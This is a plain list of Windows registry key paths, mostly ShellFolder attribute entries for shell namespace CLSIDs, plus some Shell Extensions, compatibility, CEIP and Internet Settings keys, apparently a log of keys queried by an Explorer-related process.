HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\ieframe.dll
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPSampledIn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_CLASSES_ROOT\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{26EE0668-A00A-44D7-9371-BEB064C98683}
HKEY_CLASSES_ROOT\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_CLASSES_ROOT\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{031E4825-7B94-4DC3-B131-E946B44C8DD5}
HKEY_CLASSES_ROOT\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{04731B67-D933-450A-90E6-4ACD2E9408FE}
HKEY_CLASSES_ROOT\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
HKEY_CLASSES_ROOT\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{11016101-E366-4D22-BC06-4ADA335C892B}
HKEY_CLASSES_ROOT\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\ShellFolder\WantsUniversalDelegate
